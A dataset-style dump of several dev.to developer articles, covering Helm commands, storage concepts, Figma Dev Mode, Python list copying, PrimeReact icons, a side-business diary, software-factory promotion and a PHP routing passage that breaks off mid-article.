id int64 5 1.93M | title stringlengths 0 128 | description stringlengths 0 25.5k | collection_id int64 0 28.1k | published_timestamp timestamp[s] | canonical_url stringlengths 14 581 | tag_list stringlengths 0 120 | body_markdown stringlengths 0 716k | user_username stringlengths 2 30 |
|---|---|---|---|---|---|---|---|---|
1,917,709 | Basic HELM commands | Listing the release's deployment history helm history {release} --namespace {namespace} ... | 0 | 2024-07-09T19:00:06 | https://dev.to/cnascimento/comandos-basicos-do-helm-2d36 | beginners, devops | Listing the release's deployment history
```
helm history {release} --namespace {namespace}
```
Running a rollback
```
helm rollback {release} {revision} --namespace {namespace}
```
| cnascimento |
1,917,710 | hire skilled android app developers | Supercharge your business with Centric Tech's hire skilled android app developers expertise. Our... | 0 | 2024-07-09T19:02:08 | https://dev.to/john_michel_d7eb5159adf06/hire-skilled-android-app-developers-205a |
Supercharge your business with Centric Tech's [hire skilled android app developers](https://centrictech.com/hire-android-app-developers/) expertise. Our seasoned developers are ready to turn your groundbreaking ideas into reality. Elevate your brand with top-notch Android solutions tailored to meet your unique requirements. Whether you're launching a new app or enhancing an existing one, our experienced team ensures innovation and quality in every project. Harness the power of technology to stay ahead in the competitive landscape. Choose Centric Tech for unparalleled Android app development services and bring your business to new heights.
| john_michel_d7eb5159adf06 | |
1,917,711 | Understanding Storage Concepts in System Design | Understanding Storage Concepts in System Design In system design, storage concepts play a... | 0 | 2024-07-09T19:03:14 | https://dev.to/zeeshanali0704/understanding-storage-concepts-in-system-design-363i | javascript, systemdesign, systemdesignwithzeeshanali, learning | # Understanding Storage Concepts in System Design
In system design, storage concepts play a critical role in ensuring data reliability, accessibility, and scalability. From traditional disk-based systems to modern cloud storage solutions, understanding the fundamentals of storage architecture is crucial for designing efficient and resilient systems. This article delves into various storage concepts, including primary and secondary memory, RAID and volume configurations, and different types of storage options available in the cloud.
## Primary and Secondary Memory
### Primary Memory
Primary memory, also known as main memory, is the memory that the CPU directly accesses for executing instructions and processing data. It is volatile, meaning it loses its data when the system is turned off. Primary memory includes:
- **RAM (Random Access Memory):** Used for temporarily storing data that the CPU needs during operation. It is fast but volatile.
- **ROM (Read-Only Memory):** Non-volatile memory that retains its data even when the system is powered off. It is used to store firmware and system boot instructions.
### Secondary Memory
Secondary memory, also known as auxiliary storage, is non-volatile memory used for long-term data storage. It includes devices like hard drives, solid-state drives, and optical discs. Secondary memory retains data even when the system is powered off and is typically slower than primary memory but offers much larger storage capacity.
## RAID and Volume
### RAID
RAID (Redundant Array of Independent Disks) is a storage technology that combines multiple physical disk drives into a single logical unit to improve data reliability, availability, and performance. The concept of RAID involves using multiple disks to either increase performance through parallelism, provide redundancy to protect against data loss, or both. Different RAID levels offer various configurations for data redundancy, striping, and parity:
- **RAID 0:** This level involves striping data across multiple disks without redundancy. This means that data is split into blocks and each block is written to a different disk. RAID 0 offers increased performance because multiple disks can be read or written to simultaneously. However, it does not provide fault tolerance; if one disk fails, all data is lost.
- **RAID 1:** Also known as mirroring, RAID 1 duplicates the same data on two or more disks. This provides high data redundancy because each disk is a complete copy of the other. If one disk fails, the data is still available on the other disk(s). However, the storage capacity is effectively halved because each piece of data is stored twice.
- **RAID 5:** This level uses striping with distributed parity. Data and parity (error-checking information) are striped across three or more disks. The parity information allows the array to reconstruct data if one disk fails. RAID 5 offers a good balance of performance, storage efficiency, and fault tolerance.
- **RAID 6:** Similar to RAID 5, but with double distributed parity. This means that parity information is written to two disks, allowing the array to withstand the failure of up to two disks without data loss. RAID 6 provides increased fault tolerance at the cost of additional storage overhead for the extra parity information.
- **RAID 10 (RAID 1+0):** This level combines the features of RAID 1 and RAID 0 by mirroring data and then striping it across multiple disks. This offers both high performance and redundancy. RAID 10 requires at least four disks and provides fault tolerance by mirroring, while also improving performance through striping.
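The capacity and fault-tolerance trade-offs above can be sketched numerically. The helper below is a simplified illustration (the disk counts and sizes are hypothetical, not tied to any real controller), and the XOR snippet shows why distributed parity lets RAID 5 rebuild a lost block:

```python
# Usable capacity for n identical disks of disk_size each, per RAID level.
def raid_usable_capacity(level, n, disk_size):
    if level == 0:
        return n * disk_size            # striping only, no redundancy
    if level == 1:
        return disk_size                # every disk is a full mirror
    if level == 5:
        assert n >= 3
        return (n - 1) * disk_size      # one disk's worth of parity
    if level == 6:
        assert n >= 4
        return (n - 2) * disk_size      # two disks' worth of parity
    if level == 10:
        assert n >= 4 and n % 2 == 0
        return (n // 2) * disk_size     # mirrored pairs, then striped
    raise ValueError(f"unsupported RAID level: {level}")

print(raid_usable_capacity(5, 4, 2))    # four 2 TB disks in RAID 5

# RAID 5 style parity: the parity block is the XOR of the data blocks,
# so any one missing block can be rebuilt from the remaining ones.
d0, d1, d2 = b"\x01\x02", b"\x0f\x0f", b"\xff\x00"
parity = bytes(a ^ b ^ c for a, b, c in zip(d0, d1, d2))
rebuilt_d1 = bytes(a ^ b ^ c for a, b, c in zip(d0, d2, parity))
print(rebuilt_d1 == d1)  # True
```

Note how RAID 1 keeps only one disk's worth of usable space regardless of the mirror count, while RAID 5 and 6 give up one and two disks' worth of capacity for parity, respectively.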
### Volume
A volume is a logical storage unit that can span one or more physical disks or RAID arrays. Volumes are created and managed by the operating system or storage management software and provide a way to organize data into manageable units. They serve several key purposes:
- **Data Organization:** Volumes allow data to be organized into logical units, making it easier to manage, back up, and recover data.
- **File System Storage:** Volumes provide a logical space where file systems can be implemented. This includes directories, files, and metadata necessary for data storage and retrieval.
- **RAID Implementation:** Volumes can be configured with different RAID levels to meet specific requirements for performance, redundancy, and capacity. By using RAID, volumes can offer improved data reliability and performance.
Volumes can span single or multiple physical disks, and their size and configuration can be adjusted according to the needs of the system. This flexibility allows for efficient utilization of storage resources and can provide enhanced performance and fault tolerance based on the chosen RAID configuration.
## Storage Options in the Cloud
### Object Storage
Object storage is a storage architecture designed to handle large amounts of unstructured data with high durability, vast scalability, and cost-effectiveness. Unlike traditional file systems that use a hierarchical directory structure, object storage stores data as discrete units called "objects" in a flat structure. This makes object storage particularly suitable for purposes such as archival, backup, and managing massive data sets.
### Key Features of Object Storage
1. **Data as Objects**: In object storage, each piece of data is stored as an object. An object includes the data itself, metadata (information about the data), and a unique identifier. This identifier is used to locate the object in the storage system.
2. **Flat Structure**: Object storage does not use a hierarchical directory structure. Instead, all objects are stored in a flat namespace. This means that there are no nested folders, and each object is accessed directly via its unique identifier.
3. **High Durability**: Object storage systems are designed to be highly durable. Data is typically replicated across multiple servers or data centers to ensure that it is not lost due to hardware failures. This replication also aids in data recovery and availability.
4. **Scalability**: Object storage can easily scale to store vast amounts of data. As more storage capacity is needed, additional storage nodes can be added without significant reconfiguration or performance degradation.
5. **Cost-Effectiveness**: Object storage is often more cost-effective compared to other storage types, especially for storing large volumes of data over long periods. The architecture and design allow for cheaper storage solutions while maintaining durability and availability.
6. **RESTful API Access**: Data in object storage is accessed via a RESTful API, which makes it suitable for integration with various web-based applications and services. This API-driven access is different from the traditional block or file storage methods.
7. **Performance**: While object storage excels in durability and scalability, it is relatively slower compared to block or file storage. This is because it is optimized for high-throughput and large-scale data management rather than low-latency operations.
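The flat, key-addressed model described above can be illustrated with a minimal in-memory sketch. The `ObjectStore` class, its `put`/`get` methods, and the example key are all hypothetical, not any real cloud API; they only mirror the idea of objects as data plus metadata plus a unique identifier:

```python
import hashlib

class ObjectStore:
    """Toy object store: a flat namespace mapping key -> (data, metadata).
    There are no directories; slashes in a key are just part of the name."""
    def __init__(self):
        self._objects = {}

    def put(self, key, data, **metadata):
        # Real services compute a content fingerprint (an "ETag") similarly.
        metadata["etag"] = hashlib.md5(data).hexdigest()
        self._objects[key] = (data, metadata)
        return metadata["etag"]

    def get(self, key):
        return self._objects[key]

store = ObjectStore()
store.put("backups/2024/db.dump", b"...", content_type="application/octet-stream")
data, meta = store.get("backups/2024/db.dump")
print(meta["content_type"])  # application/octet-stream
```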
### Examples of Object Storage Services
- **AWS S3 (Amazon Simple Storage Service)**
- **Google Cloud Storage**
- **Azure Blob Storage**
### Use Cases for Object Storage
- **Archival Storage**: Object storage is ideal for long-term data retention and archival purposes. Its high durability ensures that data remains intact over extended periods.
- **Backup**: Due to its cost-effectiveness and scalability, object storage is commonly used for storing backup data. It can handle large volumes of data and provide reliable storage for recovery purposes.
- **Content Distribution**: Object storage can store and deliver static content such as images, videos, and documents. The flat structure and RESTful API access make it suitable for serving content to web applications and users.
- **Data Lakes**: Organizations use object storage to build data lakes, where vast amounts of unstructured data from various sources are stored for analytics and processing.
### File Storage
File storage builds on block storage by providing a higher-level abstraction for managing files and directories. It organizes data into a hierarchical structure of files and folders, making it easy for users and applications to store, retrieve, and manage data in a familiar way. File storage is commonly used for general-purpose storage solutions and is accessible by multiple servers using file-level network protocols such as SMB/CIFS (Server Message Block/Common Internet File System) and NFS (Network File System).
### Key Features of File Storage
1. **Hierarchical Directory Structure**: File storage uses a tree-like structure to organize data into files and directories. This structure is intuitive and easy to navigate, allowing users to create, delete, move, and manage files and directories.
2. **File-Level Access**: File storage provides access to data at the file level, meaning that operations are performed on whole files rather than on individual blocks or objects. This makes it suitable for applications that require granular access to data.
3. **Network Accessibility**: File storage can be accessed by multiple servers over a network using standard file-sharing protocols. SMB/CIFS and NFS are commonly used protocols that enable file sharing and collaborative access to data across different systems and platforms.
4. **Compatibility**: File storage systems are compatible with various operating systems and applications, making them versatile and widely adopted. They support a range of file formats and data types, from text documents and images to videos and log files.
5. **Data Management**: File storage systems offer built-in mechanisms for data management, including file permissions, quotas, and snapshots. These features help in managing access control, limiting storage usage, and creating point-in-time copies of data for backup and recovery.
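The hierarchical structure and file-level access described above can be illustrated with Python's standard library; the directory and file names below are just examples:

```python
import tempfile
from pathlib import Path

# Build a small hierarchical tree under a temporary directory.
root = Path(tempfile.mkdtemp())
(root / "docs").mkdir()
(root / "docs" / "report.txt").write_text("quarterly numbers")
(root / "media").mkdir()
(root / "media" / "logo.png").write_bytes(b"\x89PNG...")

# File-level access: the application reads whole files by path.
print((root / "docs" / "report.txt").read_text())

# The tree can be walked recursively, unlike a flat object namespace.
files = sorted(p.relative_to(root).as_posix() for p in root.rglob("*") if p.is_file())
print(files)  # ['docs/report.txt', 'media/logo.png']
```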
### Examples of File Storage Systems
- **Local File Systems**: These are file systems that operate on a single machine. Examples include:
- **ext4**: A widely used file system in Linux.
- **NTFS (New Technology File System)**: The default file system for Windows operating systems.
- **Distributed File Systems**: These file systems spread data across multiple machines to provide high availability, scalability, and redundancy. Examples include:
- **NFS (Network File System)**: A distributed file system protocol allowing access to files over a network.
- **HDFS (Hadoop Distributed File System)**: A file system designed for storing large data sets across multiple machines in a Hadoop cluster.
- **Cloud Storage Services**: These services provide file storage capabilities in the cloud, offering scalability, durability, and accessibility from anywhere. Examples include:
  - **Amazon EFS (Elastic File System)**
  - **Google Cloud Filestore**
### Advantages of File Storage Systems
1. **Simplicity**: File storage systems are easy to use and understand. The hierarchical directory structure is intuitive, making it straightforward for users to manage their data. This simplicity makes file storage suitable for small to medium-sized datasets and general-purpose storage needs.
2. **Flexibility**: File storage can handle a wide variety of data types and formats, including unstructured and semi-structured data such as documents, images, videos, and logs. This versatility makes it a good choice for many different applications and use cases.
3. **Cost-Effective**: File storage systems are often less expensive than more complex storage solutions like databases. They provide a cost-effective option for large-scale storage needs, especially when data doesn't require the advanced features of a database.
### Use Cases for File Storage
- **General Data Storage**: Storing everyday files such as documents, spreadsheets, and presentations.
- **Media Storage**: Managing large collections of images, videos, and audio files.
- **Log Storage**: Keeping application and system logs for monitoring and analysis.
- **Backup and Archiving**: Creating backups of important data and archiving old data for long-term retention.
- **Collaborative Work**: Enabling file sharing and collaboration among multiple users and systems in an organization.
### Block Storage
Block storage refers to a type of data storage commonly used in enterprise environments. It involves using storage devices like hard disk drives (HDDs) and solid-state drives (SSDs) to store data in raw blocks. These blocks of data are presented to the server as a volume, providing a flexible and versatile form of storage. Here, the server is responsible for formatting these raw blocks to use as a file system or for handing control of the blocks to an application directly.
### Key Features of Block Storage
1. **Raw Data Blocks**: Block storage divides data into fixed-size chunks called blocks. Each block has its own address but does not contain any metadata about the file it belongs to; that is managed at the server level.
2. **Volume Presentation**: The blocks are presented to the server as a volume. A volume is a storage device that the server can format and use like a traditional hard drive. It can be partitioned, formatted with a file system, and mounted by the operating system.
3. **Versatility**: Block storage can be used for a variety of purposes:
   - **File systems**: Servers can format the blocks and use them as file systems to store files and directories.
   - **Applications**: Some applications, such as databases or virtual machine engines, manage the blocks directly to maximize performance.
4. **Performance Optimization**: By directly managing the blocks, applications can optimize how data is read and written. This direct access can result in higher performance, making block storage suitable for high-performance applications such as transactional databases and virtual machines.
Block storage is not limited to physically attached devices. It can also be connected to a server over a high-speed network using industry-standard protocols like Fibre Channel (FC) and iSCSI. Network-attached block storage still presents raw blocks to the server, functioning in the same way as physically attached storage.
Regardless of whether block storage is network-attached or physically attached, it is fully owned by a single server and is not a shared resource. This exclusive ownership allows for high performance and efficient management by the server.
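The raw-block model can be sketched in a few lines. `BlockDevice` here is a hypothetical stand-in for a disk or volume, not a real driver; it only shows that the device knows fixed-size, numbered blocks and nothing about files:

```python
class BlockDevice:
    """Sketch of a raw block device: fixed-size blocks addressed by
    logical block address (LBA), with no notion of files or directories."""
    def __init__(self, num_blocks, block_size=512):
        self.block_size = block_size
        self._blocks = bytearray(num_blocks * block_size)

    def write_block(self, lba, data):
        assert len(data) == self.block_size, "writes are whole blocks"
        offset = lba * self.block_size
        self._blocks[offset:offset + self.block_size] = data

    def read_block(self, lba):
        offset = lba * self.block_size
        return bytes(self._blocks[offset:offset + self.block_size])

dev = BlockDevice(num_blocks=8, block_size=512)
dev.write_block(3, b"A" * 512)
print(dev.read_block(3)[:4])  # b'AAAA'
```

A file system or database built on top of this interface decides how to map files or records onto block numbers, which is exactly the "server is responsible for formatting" point above.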
### Use Cases for Block Storage
Block storage is widely used in various scenarios due to its high performance and versatility:
- **Databases**: High-performance databases often use block storage to ensure fast read and write operations. The ability to manage blocks directly allows databases to optimize data access patterns.
- **Virtual Machines**: Virtual machine environments benefit from block storage because it provides the necessary performance and flexibility. Each virtual machine can have its own block storage volume, isolating its storage from others.
- **Enterprise Applications**: Many enterprise applications that require fast, reliable storage use block storage. This includes applications like email servers, transaction processing systems, and content management systems.
### Database Storage
Database storage systems store data in a structured format, organized in tables with rows and columns. They are used for storing structured data, such as customer information, transactions, and product catalogs. Common database storage systems include relational databases (e.g., MySQL, PostgreSQL), NoSQL databases (e.g., MongoDB, Cassandra), and NewSQL databases (e.g., CockroachDB, TiDB).
**Advantages of Database Storage Systems:**
- **Query capabilities:** Powerful querying capabilities for complex data retrieval and analysis.
- **Data integrity:** Ensures data integrity through features like transactions, ACID properties (Atomicity, Consistency, Isolation, Durability), and constraints.
- **Scalability:** Designed to scale horizontally and vertically, suitable for large datasets and high concurrency.
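The ACID properties mentioned above can be demonstrated with Python's built-in `sqlite3` module. In this sketch, a transfer that violates a constraint is rolled back atomically, so neither account changes (the table and account names are illustrative):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE accounts (name TEXT PRIMARY KEY, balance INTEGER CHECK (balance >= 0))"
)
conn.execute("INSERT INTO accounts VALUES ('alice', 100), ('bob', 50)")
conn.commit()

try:
    with conn:  # transaction: commits on success, rolls back on error
        conn.execute("UPDATE accounts SET balance = balance - 200 WHERE name = 'alice'")
        conn.execute("UPDATE accounts SET balance = balance + 200 WHERE name = 'bob'")
except sqlite3.IntegrityError:
    pass  # CHECK constraint violated, so the whole transfer was rolled back

balances = dict(conn.execute("SELECT name, balance FROM accounts"))
print(balances)  # {'alice': 100, 'bob': 50}: neither row changed
```

Atomicity is what makes the partial debit invisible: either both `UPDATE` statements take effect or neither does.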
## FAQs
1. **What is the difference between file storage systems and database storage systems?**
- File storage systems store data in files in a hierarchical structure, suitable for unstructured or semi-structured data. Database storage systems store data in structured formats, organized in tables, suitable for structured data with powerful querying capabilities.
2. **When should I use a file storage system?**
- File storage systems are ideal for storing large files, such as images and videos, and for scenarios where multiple users or applications need to access the same files concurrently.
3. **When should I use a database storage system?**
- Database storage systems are suitable for storing structured data, such as customer information and transactions, and for scenarios requiring complex queries, data joins, and aggregations.
4. **What are the scalability challenges of file storage systems?**
- Scaling file storage systems can be challenging, especially when dealing with large datasets and high concurrency, as they are designed primarily for simplicity and flexibility rather than scalability.
5. **What are the cost considerations for file storage systems?**
- File storage systems are often less expensive than database storage systems, especially for large-scale storage needs. However, costs can vary based on the storage provider and the scale of the deployment.
Understanding these storage concepts and their applications is essential for designing robust and scalable systems that can handle varying data requirements efficiently.
More Details:
Get all articles related to system design
Hashtag: SystemDesignWithZeeshanAli
[systemdesignwithzeeshanali](https://dev.to/t/systemdesignwithzeeshanali)
Git: https://github.com/ZeeshanAli-0704/SystemDesignWithZeeshanAli
| zeeshanali0704 |
1,917,712 | Master Figma Dev Mode | What is Figma Dev Mode? Figma Dev Mode is a powerful feature designed to bridge the gap... | 0 | 2024-07-09T19:17:59 | https://codeparrot.ai/blogs/figma-dev-mode | webdev, figma, frontend | ## What is Figma Dev Mode?
Figma Dev Mode is a powerful feature designed to bridge the gap between designers and developers, facilitating smoother collaboration and more efficient workflows. It provides developers with a detailed view of design files, including access to specs, assets, and code snippets, ensuring that design implementation is as accurate and seamless as possible.
## How to Use Figma Dev Mode
### Step-by-Step Guide with Examples and Screenshots
1. **Accessing Dev Mode**:
- Open your Figma project.
- Navigate to the top-right corner and click on the Dev Mode icon.
- Keyboard Shortcut: ⇧ + D

2. **Exploring the Interface**:
- The interface will display a split view: the design on one side and the code/asset details on the other.

   - First, you will see the code section. It shows the CSS code, and you can switch the language if you are building for iOS or Android. You can also see some Figma plugins if you have them installed.
- You can see the borders and padding in the sidebar.

- **Selection Colors** section shows all the colors used in the selected element or group of elements.

- The **Assets** section allows you to access all the visual assets associated with the selected design element. This includes icons, images, and other graphical elements.
- Developers can download these assets in various formats such as PNG, SVG, or PDF, ensuring they have the necessary files for implementation.

- The **Export** section provides options to export selected elements or entire frames. You can specify the file format, resolution, and other export settings.

3. **Collaboration Tools**:
- Use comments and annotations to communicate directly within the design file.
- Assign tasks and share feedback in real-time with your team.

## Figma Dev Mode Pricing
### Starter Team - Free
- **Cost:** Free
- **Best for:** Individuals or small teams just starting out with limited collaboration needs.
- **Features:** Basic Figma editor, 3 collaborative design files, unlimited personal drafts, basic file inspection.
### Professional Team - $15/full seat/month
- **Cost:** $15 per full seat/month (Save 20% when billed annually)
- **Best for:** Small to medium-sized teams needing more collaboration tools and advanced prototyping. **Free for students and educators.**
- **Features:** Unlimited Figma files, team libraries, advanced prototyping, view annotations, advanced inspection, VS Code extension, unlimited version history, shared and private projects.
### Organization - $45/full seat/month or $25/month for Dev Mode only (billed annually)
- **Cost:** $45 per full seat/month or $25/month for Dev Mode only (billed annually)
- **Best for:** Larger teams needing organization-wide design management and analytics.
- **Features:** Org-wide libraries, design system analytics, branching and merging, private plugins, centralized file management, unified admin and billing, single sign-on.
### Enterprise - $75/full seat/month or $35/month for Dev Mode only (billed annually)
- **Cost:** $75 per full seat/month or $35/month for Dev Mode only (billed annually)
- **Best for:** Enterprises requiring advanced security, customization, and administrative controls.
- **Features:** Advanced design system theming, sync variables to code via REST API, default libraries by workspace, set default code language, pin and auto-run plugins, dedicated workspaces, guest access controls, seat management via SCIM, idle session timeout, advanced link sharing controls.
## Benefits of Using Figma Dev Mode
1. **Improved Collaboration**:
- Figma Dev Mode enhances communication between designers and developers, reducing misunderstandings and errors in design implementation.
2. **Efficiency**:
- The feature streamlines the handoff process, saving time by providing developers with all the necessary design details in one place.
3. **Accuracy**:
- Developers get precise specifications and ready-to-use code snippets, ensuring that the final product matches the original design.
4. **Asset Management**:
- Easily download and manage design assets without the need for additional tools, keeping everything organized and accessible.
5. **Real-Time Updates**:
- As designs are updated, changes are reflected in real-time, ensuring that everyone is always working with the latest version.

By integrating Figma Dev Mode into your workflow, you can achieve a more cohesive and efficient design-to-development process, ultimately leading to better products and faster delivery times. | mvaja13 |
1,917,763 | Multiple ways to Clone or Copy a list in Python | Python provide multiple ways to achieve the desired result. For example, to copy a list to another... | 0 | 2024-07-09T19:41:53 | https://dev.to/pallavi_kumari_/multiple-ways-to-clone-or-copy-a-list-in-python-13c0 | python, beginners | Python provide multiple ways to achieve the desired result. For example, to copy a list to another list there are different methods:
- Through the list slicing operation

```python
# Method 1: list slicing
lstcopy = lst[:]
print("Cloning by list slicing lst[:] ", lstcopy)
```
- Through the copy() method

```python
# Method 2: the built-in copy() method
lstcopy = lst.copy()
print("Cloning by list copying lst.copy() ", lstcopy)
```
- Through a list comprehension

```python
# Method 3: list comprehension
lstcopy = [i for i in lst]
print("Cloning by list comprehension ", lstcopy)
```
- Through the append() method

```python
# Method 4: appending in a loop
lstcopy = []
for i in lst:
    lstcopy.append(i)
print("Cloning by list append ", lstcopy)
```
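One caveat worth knowing: all four methods above make *shallow* copies. If the list contains mutable elements (such as nested lists), the copy shares those inner objects with the original; `copy.deepcopy` from the standard library copies them too:

```python
import copy

lst = [[1, 2], [3, 4]]
shallow = lst[:]           # the inner lists are shared with lst
deep = copy.deepcopy(lst)  # the inner lists are copied as well

lst[0].append(99)
print(shallow[0])  # [1, 2, 99] because the change is visible through the shallow copy
print(deep[0])     # [1, 2] because the deep copy is unaffected
```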
Thanks,
I hope you learned something new from this article! Thanks for your support. | pallavi_kumari_ |
1,917,713 | How To Add PrimeReact Icon In React App | Install PrimeReact and PrimeIcons: First, make sure you have primereact and primeicons installed in... | 0 | 2024-07-09T19:18:31 | https://dev.to/vishalbhuva666/how-to-add-primereact-icon-in-react-app-11ph | primereact, primereacticon, besticon, reacticon | Install PrimeReact and PrimeIcons:
First, make sure you have primereact and primeicons installed in your project.
If not, you can install them using npm or yarn:
**npm install primereact primeicons
yarn add primereact primeicons**
Import the CSS files: Import the necessary CSS files for PrimeReact and PrimeIcons in your `index.js` or `App.js` file.

```javascript
import 'primereact/resources/themes/saga-blue/theme.css';
import 'primereact/resources/primereact.min.css';
import 'primeicons/primeicons.css';
```
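With the packages installed and the CSS imported, an icon can be rendered with the `pi pi-*` class names from the PrimeIcons set. The component name below is just an illustrative example:

```javascript
import React from 'react';
import { Button } from 'primereact/button';

export default function IconDemo() {
  return (
    <div>
      {/* Standalone icon via its PrimeIcons CSS class */}
      <i className="pi pi-check" style={{ fontSize: '1.5rem' }}></i>
      {/* PrimeReact components also accept an icon prop */}
      <Button label="Save" icon="pi pi-save" />
    </div>
  );
}
```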
| vishalbhuva666 |
1,917,759 | Juggling a Developer Job, Part-Time SaaS and Conference Speaking | Working on SaaS, conference speaking, and a developer job at the same time is challenging. This is how I juggle all of it. | 0 | 2024-07-09T19:22:00 | https://www.eddyvinck.com/blog/juggling-job-saas-and-conference-speaking/ | webdev, javascript, ai, react | ---
title: Juggling a Developer Job, Part-Time SaaS and Conference Speaking
published: true
description: Working on SaaS, conference speaking, and a developer job at the same time is challenging. This is how I juggle all of it.
tags: webdev, javascript, ai, react
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/k63g4fds5mr9cr10qldh.jpg
# Use a ratio of 100:42 for best results.
published_at: 2024-07-09 19:22 +0000
canonical_url: https://www.eddyvinck.com/blog/juggling-job-saas-and-conference-speaking/
---
_This was originally posted on [my website's blog](https://www.eddyvinck.com/blog/juggling-job-saas-and-conference-speaking/)._
Launching a side business is no small thing, especially when you're juggling a job and a personal life. I've recently started this challenging journey with my blogging SaaS, Blog Recorder. It's been a couple of weeks since the launch, and I'm proud to say it's been quite successful for a small, part-time business.
## The early success
I've managed to secure six paying customers, with four opting for annual subscriptions and two on a monthly basis. This has brought me to a modest $75 in monthly recurring revenue, and I've attracted over 120 users in total. To me that is a huge win, and every new customer and piece of feedback is a cause for celebration.
## The grind of part-time entrepreneurship
I work 32 hours a week at my day job as a software developer, and I dedicate my other time to my business. That's nights, weekends, and a full dedicated day off. It's a grind, but it's really fulfilling. I'm also passionate about conference speaking, which I've been trying to maintain alongside my SaaS.
## Balancing work, speaking, and personal life
The balance is tough. Preparing for a conference talk while running a business and working part-time is taxing. I'm flying to Wisconsin for THAT Conference, an event I'm excited about, but it has required a lot of legwork to find a sponsor to help cover travel costs.
Thankfully, the conference organizers have been supportive, offering a good deal on my hotel stay. And surprisingly, I've also been given the opportunity to be on the list of sponsors for the conference, which includes a table to promote Blog Recorder. They really didn't need to do that, and I'm really thankful for this chance. It will be the first time I'm sponsoring an event and promoting something myself, so I'm curious how it will go.
## The reality of overcommitment
Despite the excitement, I've come to realize that I may have underestimated the amount of work I can handle over an extended period. Everything from launching the product to figuring out international sales tax with my accountant has been a lot to manage. I'm learning that in the long term I need to cut back and focus on fewer tasks to maintain a sustainable pace if I keep doing this outside of my developer job.
## The importance of self-care
One crucial lesson I've learned is the importance of self-care. Ensuring I get a full eight hours of sleep and not slipping into hermit mode are top priorities. I'm no longer skipping the gym to get a few extra hours of work in, which is something I intentionally did to work on my launch.
Socializing is also key. I want to make sure I stay in contact with friends and family.
## Preparing for the conference
As for the conference, I am outlining my talk, building a demo application for a small product, and polishing my slides. I'm not too worried about giving the talk itself as I'm confident in my speaking abilities, but the preparation is key and is still a lot of work for the upcoming weeks.
## Intentionality and focus
In the end, it's about being intentional with my time and energy. Saying no to many good things to focus on the right things is hard but necessary. As a part-time entrepreneur, conference speaker, partner, and individual, focusing on what truly matters is the key to success and a long-term sustainable work-life balance.
In conclusion, managing part-time SaaS, conference speaking and a developer job is really challenging sometimes, but it is also something that makes me happy. It requires a good balance of work, passion projects, and personal life. With intentionality, focus, and taking care of yourself, it is definitely possible. But choosing these things means saying no to a lot of other things.
## And before you ask..
Yes, this post was created using [Blog Recorder](https://blogrecorder.com)! It can export to markdown, so crossposting to Dev.to is super easy! I'll be sharing my articles here more often 🥳 | eddyvinck |
1,917,760 | **Join Try Catch Factory and Discover a World of Tech Benefits!** 🌐 | Hi Chiquis! 👋🏻 Do you know what a software factory is, or the benefits it offers developers or future... | 0 | 2024-07-09T19:29:49 | https://dev.to/orlidev/-unete-a-try-catch-factory-y-descubre-un-mundo-de-beneficios-tecnologicos--5bbd | productivity, webdev, microservices, beginners | Hi Chiquis! 👋🏻 Do you know what a software factory is, or the benefits it offers developers and future clients? If your answer is no, don't worry! We're going to dive into the fascinating world of software factories while we prepare with great fanfare for the big launch of Try Catch Factory 🧑🏻🏭, the community that is revolutionizing the way software is developed. The wait is about to end, and Try Catch Factory is pleased to announce that its official launch is just around the corner!

Software Factories 👩💻
A software factory implements various strategies to support and empower its developers, with the goal of fostering their professional growth, well-being, and job satisfaction, which in turn translates into better results for the company. These initiatives include:
- Training and professional development.
- Tools and resources.
- A positive work environment.
- Growth opportunities.
By implementing these strategies, software factories can create a work environment that attracts and retains the best developers, which translates into greater productivity, innovation, and success for the company and its developers.

At Try Catch Factory, 🖱️ we focus on developing high-quality products and features using efficient code. We also facilitate collaborative development based on the specific needs and requirements of clients and users. 😊
Tailor-Made Innovation 💻
At Try Catch Factory, we don't believe in generic solutions. Our team of expert developers builds custom applications that fit your specific needs like a glove. Why settle for the ordinary when you can have something designed especially for you? 🤝
High-Level Technology Consulting ⚙️
Do you feel lost in the world of technology? Don't worry. At Try Catch Factory, we offer first-class technology consulting. We help you optimize your processes and make informed decisions about the latest trends and tools. You'll never feel like a fish out of water again!
Continuous Support 🖥️
What if something goes wrong? Don't worry, we're here for you. Our support team makes sure your systems run smoothly. If you have a question, a problem, or just need a little encouragement, we're only a message away. No more calls into the void!

Exclusive Benefits for Our Clients 🧑🏻💻
Want to know a secret? Try Catch Factory clients get access to exclusive benefits. We make sure you become part of a special community. It's not just software, it's an experience! ✨
Speed, Efficiency, and Success 🚀
At Try Catch Factory, we don't just build software, we create opportunities for success. Your project will be a step forward in efficiency and effectiveness. So, what are you waiting for? Join Try Catch Factory and discover a world of technological possibilities. We promise you won't regret it! 📈

Revolutionize your business and achieve success with Try Catch Factory software solutions! Stand out from the competition with innovative, custom software solutions. 💯
🚀 Did you like it? Share your opinion.
For the full article, visit: https://lnkd.in/ewtCN2Mn
https://lnkd.in/eAjM_Smy 👩💻 https://lnkd.in/eKvu-BHe
https://dev.to/orlidev Don't miss it!
References:
Images created with: Copilot (microsoft.com)
##PorUnMillonDeAmigos #LinkedIn #Hiring #DesarrolloDeSoftware #Programacion #Networking #Tecnologia #Empleo #TryCatchFactory

 | orlidev |
1,917,761 | Extraction of Form Validation Object and Authenticate Class | In our previous project, we learned how to login or logout a registered user. But today, we will... | 0 | 2024-07-09T19:33:02 | https://dev.to/ghulam_mujtaba_247/extraction-of-form-validation-object-and-authenticate-class-b8m | webdev, beginners, css | In our previous project, we learned how to login or logout a registered user. But today, we will learn how to extract a form validation object and about authenticate class extraction in the project.
## On VS Code Side
To start the project, we need to add a new directory named Http and move the controllers into it. Next, we add another new directory inside Http named Forms and create a new file `LoginForm.php` in this directory. If we run the project now, it will show an error because the controllers have been moved to a new directory, so their paths need to be updated in `routes.php`.
```php
$router->get('/', 'index.php');
$router->get('/about', 'about.php');
$router->get('/contact', 'contact.php');
$router->get('/notes', 'notes/index.php')->only('auth');
$router->get('/note', 'notes/show.php');
$router->delete('/note', 'notes/destroy.php');
$router->get('/note/edit', 'notes/edit.php');
$router->patch('/note', 'notes/update.php');
$router->get('/notes/create', 'notes/create.php');
$router->post('/notes', 'notes/store.php');
$router->get('/register', 'registration/create.php')->only('guest');
$router->post('/register', 'registration/store.php')->only('guest');
$router->get('/login', 'session/create.php')->only('guest');
$router->post('/session', 'session/store.php')->only('guest');
$router->delete('/session', 'session/destroy.php')->only('auth');
```
## Extract Form Validation Object
